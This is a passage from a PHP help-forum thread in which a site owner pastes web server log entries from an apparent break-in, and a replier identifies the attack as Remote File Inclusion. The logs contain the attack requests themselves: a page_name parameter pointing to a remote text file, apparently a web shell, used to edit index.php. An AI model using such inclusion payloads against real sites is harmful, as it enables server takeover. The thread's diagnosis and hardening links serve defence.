/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=change
Http Code: 200 	Date: Dec 06 07:20:51 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=f&f=index.php&ft=edit&am
Http Code: 200 	Date: Dec 06 07:21:37 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/
Http Code: 200 	Date: Dec 06 07:22:19 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1





    *  


/favicon.ico
Http Code: 404 	Date: Dec 06 07:22:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1





    *  


/index.php?page_name=http://freewebs.com/xugurx/ugur.txt?
Http Code: 200 	Date: Dec 06 07:23:27 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Link to comment
Share on other sites
Daniel0 Advanced Member

Daniel0

Posted
Posted

Do you think this is the way the website got hacked?

 

That's quite likely. The script at the end of that URL seems to be rootkit. That vulnerability is called RFI (Remote File Inclusion).

 

**Can anyone tell me how to fix this (apart from the obvious filtering the input to make sure that it is only alpha-numerical).

 

Not without having access to the code.

 

Could you also recommend me a good tutorial/book on php/web security

 

You may check out some of the tutorials we have here on PHP Freaks:

http://www.phpfreaks.com/tutorial/php-security

http://www.phpfreaks.com/tutorial/preventing-remote-file-include-attacks-with-mod-rewrite

http://www.phpfreaks.com/tutorial/hardening-php-with-suhosin

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.